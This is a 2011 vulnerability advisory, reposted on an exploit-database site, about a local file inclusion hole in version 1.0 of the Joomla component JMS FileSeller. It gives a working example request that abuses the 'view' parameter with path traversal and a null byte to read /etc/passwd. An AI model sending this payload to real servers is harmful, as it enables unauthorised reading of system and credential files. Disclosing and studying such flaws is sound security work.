[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_jmsfileseller Local File Inclusion Vulnerability

Author
Valentin Hobel
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16190
Category
web applications
Date add
28-05-2011
Platform
php
# Exploit Title: Joomla Component com_jmsfileseller Local File Inclusion Vulnerability
# Date: 28.05.2011
# Author: Valentin
# Category: webapps/0day
# Version: 1.0
 
# Tested on:
# CVE : 
# Code :
 
 
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
>> General Information
Advisory/Exploit Title = Joomla Component com_msfileseller Local File Inclusion Vulnerability
Author = Valentin Hoebel
Contact = valentin@xenuser.org
 
 
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = JMS FileSeller
Vendor = Joommasters team
Vendor Website = http://joommasters.com/
Affected Version(s) = 1.0
 
 
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
>> Local File Inclusion
URL: index.php?option=com_jmsfileseller&view=<LFI value>&cat_id=1&Itemid=27
Vulnerable parameters: view
Example: index.php?option=com_jmsfileseller&view=../../../etc/passwd%00&cat_id=12&Itemid=27
 
 
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
>> Additional Information
Advisory/Exploit Published = 28.05.2011
 

 
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]



#  0day.today [2024-12-24]  #